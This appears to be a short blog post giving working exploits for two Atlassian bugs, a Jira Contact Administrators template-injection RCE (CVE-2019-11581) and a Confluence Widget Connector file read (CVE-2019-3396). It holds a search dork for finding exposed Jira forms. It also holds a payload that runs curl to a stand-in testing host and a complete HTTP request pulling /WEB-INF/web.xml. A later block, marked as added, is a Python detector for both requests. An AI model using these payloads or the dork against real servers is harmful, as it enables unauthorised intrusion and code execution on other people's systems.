Two Easy RCE in Atlassian Products

Valeriy Shevchenko
Aug 9 · 4 min read

1. Jira Remote Code Execution in Contact Administrators form (CVE-2019-11581)

inurl:secure/ContactAdministrators!default.jspa
https://jira.example.com/secure/ContactAdministrators!default.jspa
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://your-testing-server.com/rcetest?a=a').waitFor()

2. Confluence Remote Code Execution via Widget Connector macro (CVE-2019-3396)

POST /rest/tinymce/1/macro/preview HTTP/1.1
Referer: https://confluence.yourtarget.com/
Content-Type: application/json; charset=utf-8
Cookie: BIGipServerrb-p_cp-confluence_https_pool=!BUsntvn1os/4xuQWbHAsuN+1fsz22TIKPNFouw==;JSESSIONID=E3A43CEFE1932634CD80E301057C379D
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 173
Host: confluence.yourtarget.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

{"contentId":"123","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=1","width":"200","height":"200","_template":"/WEB-INF/web.xml"}}}
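A defender-side check for the two requests above, added here as an example and not part of the original post. It classifies request records as a reverse proxy or WAF might log them (the records below are constructed samples, not real traffic, and the record layout is an assumption) by the marker each request carries: Velocity template syntax inside a Contact Administrators form field for CVE-2019-11581, and a client-supplied `_template` parameter sent to the widget macro preview endpoint for CVE-2019-3396.

```python
import json
import re
from typing import Optional

# Constructed sample request records (method, path, body) in the shape a
# proxy or WAF log might take. Assumed layout, not real captured traffic.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/secure/ContactAdministrators!default.jspa", "body": ""},
    {"method": "POST", "path": "/secure/ContactAdministrators.jspa",
     "body": "subject=hi&details=$i18n.getClass().forName('java.lang.Runtime')"},
    {"method": "POST", "path": "/rest/tinymce/1/macro/preview",
     "body": json.dumps({"contentId": "123", "macro": {"name": "widget", "body": "",
             "params": {"url": "https://www.youtube.com/watch?v=1",
                        "_template": "/WEB-INF/web.xml"}}})},
    {"method": "POST", "path": "/rest/tinymce/1/macro/preview",   # benign preview
     "body": json.dumps({"contentId": "123", "macro": {"name": "widget", "body": "",
             "params": {"url": "https://www.youtube.com/watch?v=1", "width": "200"}}})},
]

# Velocity syntax a form field should never legitimately contain:
# a "$object.method(" call or a "#set/#if/#foreach" directive.
VELOCITY_RE = re.compile(r"\$[A-Za-z_]\w*\.\w+\(|#(?:set|if|foreach)\b")


def classify(req: dict) -> Optional[str]:
    """Return the CVE id a request matches, or None if it looks benign."""
    path, body = req["path"], req["body"]
    # CVE-2019-11581: template expression submitted to the Contact Administrators form
    if "ContactAdministrators" in path and VELOCITY_RE.search(body):
        return "CVE-2019-11581"
    # CVE-2019-3396: widget macro preview with a client-chosen _template parameter
    if path.startswith("/rest/tinymce/1/macro/preview"):
        try:
            doc = json.loads(body)
        except ValueError:
            return None
        macro = doc.get("macro") if isinstance(doc, dict) else None
        if isinstance(macro, dict) and macro.get("name") == "widget":
            params = macro.get("params")
            if isinstance(params, dict) and "_template" in params:
                return "CVE-2019-3396"
    return None


def scan(requests: list) -> list:
    """Return (path, cve) pairs for every request that matched a signature."""
    hits = [(r["path"], classify(r)) for r in requests]
    return [h for h in hits if h[1] is not None]
```

Any `_template` value from the client is flagged, not only paths under `/WEB-INF/`, since the parameter is never expected from the browser; tune the Velocity regex if form fields in your instance legitimately contain `$` or `#`.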

Written by Valeriy Shevchenko
I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller
